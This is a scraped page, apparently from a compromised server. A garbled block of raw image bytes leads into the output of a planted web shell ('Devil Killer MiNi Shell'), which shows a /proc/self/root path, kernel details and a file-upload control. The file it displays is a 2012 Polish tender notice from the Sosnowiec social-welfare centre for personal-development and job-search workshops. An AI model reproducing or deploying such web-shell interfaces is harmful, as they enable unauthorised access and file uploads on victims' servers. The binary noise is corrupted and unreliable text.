JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120730/165111-N-2012.html

<p class="kh_header"><b>Sosnowiec: Organizacja  i przeprowadzenie stacjonarnych zajęć warsztatowych w dziedzinie rozwoju osobistego i kompetencji społecznych, indywidualnego doradztwa zawodowego oraz treningu umiejętności społecznych z elementami aktywnego poszukiwania pracy w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 2 Zadania.</b><br>
<b>Numer ogłoszenia: 165111 - 2012; data zamieszczenia: 30.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Sosnowcu , ul. Mościckiego 14, 41-200 Sosnowiec, woj. śląskie, tel. 32 2962201, faks 32 2962214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopssosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja  i przeprowadzenie stacjonarnych zajęć warsztatowych w dziedzinie rozwoju osobistego i kompetencji społecznych, indywidualnego doradztwa zawodowego oraz treningu umiejętności społecznych z elementami aktywnego poszukiwania pracy w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 2 Zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja  i przeprowadzenie stacjonarnych zajęć warsztatowych w dziedzinie rozwoju osobistego i kompetencji społecznych, indywidualnego doradztwa zawodowego oraz treningu umiejętności społecznych z elementami aktywnego poszukiwania pracy w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki - 2 Zadania tj.:
Zadanie 1 - 	Organizacja i przeprowadzenie stacjonarnych zajęć warsztatowych w dziedzinie rozwoju osobistego i kompetencji społecznych z elementami stylizacji i wizażu, oraz indywidualnego doradztwa zawodowego w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki. Liczba uczestników - maksymalnie 77 osób.
Zadanie 2 - 	Organizacja i przeprowadzenie treningu umiejętności społecznych z elementami aktywnego poszukiwania pracy w ramach Programu Aktywności Lokalnej projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.  Liczba uczestników - maksymalnie 10 osób.

Szczegółowy opis przedmiotu zamówienia zamieszczono:
- w zakresie zadania 1 -  załącznik nr 1a do SIWZ,
- w zakresie zadania 2  - załącznik nr 1b do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W zakresie Zadania 1 - Zamawiający przewiduje udzielenie zamówień uzupełniających 
w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy usług, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego 
i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.
W zakresie Zadania 2 - Zamawiający nie przewiduje zamówienia uzupełniającego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadania 1, Zadania 2: Zamawiający w zakresie tego warunku nie określa szczególnych wymagań.
Ocena spełniania warunków nastąpi na podstawie załączonego do oferty oświadczenia, 
o którym mowa w części XII SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Zadania 1, Zadania 2: Zamawiający w zakresie tego warunku nie określa szczególnych wymagań.
Ocena spełniania warunków nastąpi na podstawie załączonego do oferty oświadczenia, 
o którym mowa w części XII SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie dysponowania odpowiednim potencjałem technicznym uzna warunek za spełniony jeżeli Wykonawca wykaże, że:
1.W zakresie zadania 1 - dysponuje lub będzie dysponował minimum 4 salami szkoleniowymi zlokalizowanymi na terenie miasta Sosnowca, z dogodnym dojazdem środkami komunikacji miejskiej. Zamawiający wymaga by zajęcia warsztatowe i indywidualne doradztwo odbywało się w salach znajdujących się 
w jednym budynku. 
- Zajęcia warsztatowe określone w szczegółowym opisie przedmiotu zamówienia (Załącznik nr 1a do SIWZ) w pkt 2.1 a) i c) winny być przeprowadzone w 4 salach spełniających poniższe warunki:
a)Winny być przystosowane pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkolenia,
b)posiadać powierzchnię nie mniejszą niż 25 m2 każda,
c)posiadać dostęp do źródeł prądu,
d)posiadać miejsce na umieszczenie poczęstunku dla uczestników/uczestniczek szkolenia
e)posiadać całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
f)posiadać odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa i prowadzenia warsztatów,
g)posiadać optymalne warunki prowadzenia zajęć szkoleniowych  w grupie 10 osobowej + trener oraz dającej możliwość swobodnego przestawiania krzeseł i stołów.
h)posiadać odpowiednie oprzyrządowanie techniczne tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart wraz z kompletem mazaków,  
i)winny być ogrzewane przy spadku temperatury na zewnątrz poniżej 10 stopni C.
j)nie mogą znajdować się w piwnicy, suterenie lub poddaszu, 
k)na salach nie mogą znajdować się słupy, kolumny lub inne elementy, które utrudnią prowadzenie zajęć
- Indywidualne doradztwo zawodowe winno być przeprowadzone w 4 salach spełniających poniższe warunki:
a)winny być przystosowana pod względem sanitarnym, przeciwpożarowym 
i bhp do prowadzenia szkolenia,
b)posiadać powierzchnię nie mniejszą niż 10 m2 każda gwarantując tym samym optymalne warunki przeprowadzenia doradztwa indywidualnego (1 uczestnik/czka projektu + doradca),
c)posiadać stół i krzesła dla 2 osób,
d)posiadać tablicę  flipchart wraz z kompletem mazaków,
e)posiadać całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
f)posiadać odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa.
Zamawiający dopuszcza, aby indywidualne doradztwo zawodowe było przeprowadzone w 4 salach, w których prowadzone będą zajęcia warsztatowe.
2. W zakresie zadania 2 - dysponuje lub będzie dysponował salami szkoleniowymi zlokalizowanymi na terenie miasta Sosnowca, w odległości  maksymalnie do  2 km od centrum miasta. Zamawiający wymaga by zajęcia warsztatowe i indywidualne doradztwo odbywało się w salach znajdujących się w jednym budynku.
- Zajęcia warsztatowe określone w szczegółowym opisie przedmiotu zamówienia (Załącznik nr 1b do SIWZ) w pkt 2.1 a) i c) winny być przeprowadzone w sali spełniającej poniższe warunki:
a)Winna być przystosowana pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkolenia,
b)posiadać powierzchnię nie mniejszą niż 25 m2,
c)posiadać dostęp do źródeł prądu,
d)posiadać miejsce na umieszczenie poczęstunku dla uczestników/uczestniczek szkolenia
e)posiadać całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
f)posiadać odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa i prowadzenia warsztatów,
g)posiadać optymalne warunki prowadzenia zajęć szkoleniowych  w grupie 10 osobowej + trener oraz dającej możliwość swobodnego przestawiania krzeseł i stołów.
h)posiadać odpowiednie oprzyrządowanie techniczne tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart wraz z kompletem mazaków,  
i)winna być ogrzewana przy spadku temperatury na zewnątrz poniżej 10 stopni C.
j)nie może znajdować się w piwnicy, suterenie lub poddaszu, 
k)na sali nie mogą znajdować się słupy, kolumny lub inne elementy, które utrudnią prowadzenie zajęć.
- Zajęcia warsztatowe określone w szczegółowym opisie przedmiotu zamówienia (Załącznik nr 1b do SIWZ) w pkt  2.1 b) winny być przeprowadzone w sali spełniającej poniższe warunki:
a)Winna być przystosowana pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkolenia,
b)posiadać powierzchnię nie mniejszą niż 25 m2,
c)posiadać dostęp do źródeł prądu,
d)posiadać miejsce na umieszczenie poczęstunku dla uczestników/uczestniczek szkolenia
e)posiadać całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
f)posiadać odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa i prowadzenia warsztatów,
g)posiadać optymalne warunki prowadzenia zajęć szkoleniowych  w grupie 10 osobowej + trener oraz dającej możliwość swobodnego przestawiania krzeseł i stołów.
h)posiadać odpowiednie oprzyrządowanie techniczne tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart wraz z kompletem mazaków,  
i)winna być ogrzewana przy spadku temperatury na zewnątrz poniżej 10 stopni C.
j)nie może znajdować się w piwnicy, suterenie lub poddaszu, 
k)na sali nie mogą znajdować się słupy, kolumny lub inne elementy, które utrudnią prowadzenie zajęć,
l) wyposażona w indywidualne stanowiska komputerowe dla każdego uczestnika. Komputery wraz z dostępem do internetu musza być wyposażone w legalne, licencjonowane oprogramowanie w polskiej wersji językowej niezbędne do realizacji szkolenia
- Indywidualne doradztwo zawodowe winno być przeprowadzone w  sali spełniającej poniższe warunki:
a)winna być przystosowana pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkolenia,
b)posiadać powierzchnię nie mniejszą niż 10 m2 gwarantując tym samym optymalne warunki przeprowadzenia doradztwa indywidualnego (1 uczestnik/czka projektu + doradca),
c)posiadać stół i krzesła dla 2 osób,
d)posiadać tablicę flipchart wraz z kompletem mazaków,
e)posiadać całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
f)posiadać odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa.
Ocena spełniania warunków nastąpi na podstawie załączonych do oferty oświadczeń 
i dokumentów,  o których mowa w części XII SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie dysponowania osobami zdolnymi do wykonania zamówienia; 
 uzna warunek za spełniony jeżeli Wykonawca wykaże, że:
1. W zakresie zadania 1  - dysponuje lub będzie dysponował:
a)4 trenerami posiadającymi wykształcenie wyższe magisterskie psychologiczne lub pedagogiczne, lub socjologiczne dodatkowo każdy z trenerów winien przeprowadzić co najmniej 3 szkolenia w dziedzinie rozwoju osobistego i kompetencji społecznych obejmujące zagadnienia określone w szczegółowym opisie przedmiotu zamówienia (Załącznik nr 1a do SIWZ) w pkt 2.1. a-f w okresie maksymalnie 3 ostatnich lat przed dniem wszczęcia niniejszego postępowania,
i
b)1 trenerem posiadającym wykształcenie minimum średnie,  ukończony  kurs stylizacji i wizażu oraz który przeprowadził co najmniej 3 szkolenia nt. znaczenia wyglądu podczas rozmowy kwalifikacyjnej i w pracy zawodowej zagadnienia zostały określone w pkt. 2.1. g) szczegółowego opisu przedmiotu zamówienia (załącznik nr 1a do SIWZ) w okresie maksymalnie 3 ostatnich lat przed dniem wszczęcia niniejszego postępowania.
i
c)4 osobami posiadającymi  wykształcenie wyższe oraz uprawnienia doradcy zawodowego, dodatkowo każdy z trenerów winien przeprowadzić co najmniej 100 godzin indywidualnego doradztwa zawodowego w okresie maksymalnie 3 ostatnich lat przed dniem wszczęcia niniejszego postępowania.

Jeśli Wykonawca przedstawi, iż dysponuje większą ilością osób niż wymagana przez Zamawiającego powyżej to wówczas Zamawiający dokonując oceny spełnienia warunku będzie brał pod uwagę w zakresie punktu 1: a) pierwszych 4 trenerów,  b) pierwszego trenera, c) pierwszych 4 doradców zawodowych.

2. W zakresie zadania 2 - dysponuje lub będzie dysponował:  
a)1 trenerem posiadającym wykształcenie wyższe magisterskie psychologiczne, który przeprowadził co najmniej 3 szkolenia z zakresu kształtowania umiejętności społecznych z elementami aktywnego poszukiwania pracy obejmujące zagadnienia określone w pkt 2.1. a) i b)  szczegółowego opisu przedmiotu zamówienia (załącznik nr 1 b do SIWZ) w okresie maksymalnie 3 ostatnich lat przed dniem wszczęcia niniejszego postępowania.
i
b)1 trenerem posiadającym  wykształcenie minimum średnie, ukończony kurs stylizacji 
i wizażu, który przeprowadził co najmniej 3 szkolenia  nt. znaczenia wyglądu podczas rozmowy kwalifikacyjnej i w pracy zawodowej, zagadnienia zostały określone w pkt 2.1. c) szczegółowego opisu przedmiotu zamówienia (załącznik nr 1 b do SIWZ) w okresie maksymalnie 3 ostatnich lat przed dniem wszczęcia niniejszego postępowania.
i
c)1 osobą posiadającej wykształcenie wyższe, uprawnienia doradcy zawodowego, która przeprowadziła co najmniej 100 godzin indywidualnego doradztwa zawodowego w okresie maksymalnie 2 ostatnich lat przed dniem wszczęcia niniejszego postępowania.
Jeśli Wykonawca przedstawi, iż dysponuje większą ilością osób niż wymagana przez Zamawiającego powyżej to wówczas Zamawiający dokonując oceny spełnienia warunku będzie brał pod uwagę w zakresie punktu 2: a) pierwszego  trenera,  b) pierwszego trenera, c) pierwszego doradcę zawodowego.
Ocena spełniania warunków nastąpi na podstawie załączonych do oferty oświadczeń 
i dokumentów,  o których mowa w części XII SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie określa szczególnych wymagań.
Ocena spełniania warunków nastąpi na podstawie załączonego do oferty oświadczenia, 
o którym mowa w części XII SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo 
Pełnomocnictwo wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniona jest osoba inna niż wskazane w aktualnym odpisie z właściwego rejestru.
2. W przypadku gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dla Zadania 1 - 	Zamawiający przewiduje możliwość zmiany umowy nie naruszając przesłanek określonych w przepisie art. 144 ust. 1 ustawy wyłącznie  w sytuacji:
a)zmian personalnych odnośnie osób przedstawionych w załączniku nr 1 do niniejszej umowy po uzyskaniu zgody Zamawiającego. Wykonawca winien zwrócić się do Zamawiającego z pisemnym wnioskiem zawierającym uzasadnienie zmiany osoby wraz z informacją o kwalifikacjach osoby oraz jej doświadczeniu. Kwalifikacje osoby - zastępcy i jej doświadczenie winno być tożsame z kwalifikacjami i doświadczeniem osoby zastępowanej.
b) zmiany sal szkoleniowych wykazanych w  załączniku nr 2 do niniejszej umowy po uzyskaniu zgody Zamawiającego. Wykonawca zobowiązany jest zwrócić się do Zamawiającego z pisemnym wnioskiem załączając do niego wykaz sal szkoleniowych znajdujących się na terenie miasta Sosnowca z dogodnym dojazdem środkami komunikacji miejskiej, odpowiednio wyposażonych.
Dla Zadania 2 - Zamawiający przewiduje możliwość zmiany umowy nie naruszając przesłanek określonych w przepisie art. 144 ust. 1 ustawy wyłącznie  w sytuacji:
a)zmian personalnych odnośnie osób przedstawionych w załączniku nr 3 do niniejszej umowy po uzyskaniu zgody Zamawiającego. Wykonawca winien zwrócić się do Zamawiającego z pisemnym wnioskiem zawierającym uzasadnienie zmiany osoby wraz z informacją o kwalifikacjach osoby oraz jej doświadczeniu. Kwalifikacje osoby - zastępcy i jej doświadczenie winno być tożsame z kwalifikacjami i doświadczeniem osoby zastępowanej.
b)zmiany sal szkoleniowych wykazanych w  załączniku nr 4 do niniejszej umowy po uzyskaniu zgody Zamawiającego. Wykonawca zobowiązany jest zwrócić się do Zamawiającego z pisemnym wnioskiem załączając do niego wykaz sal szkoleniowych znajdujących się na terenie miasta Sosnowca, zlokalizowanych odległości  maksymalnie do  2 km od centrum miasta, odpowiednio wyposażonych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Sosnowcu
ul. 3 Maja 33
41-200 Sosnowiec
piętro I, pokój 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2012 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Sosnowcu
ul. 3 Maja 33
41-200 Sosnowiec
piętro II, pokój 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




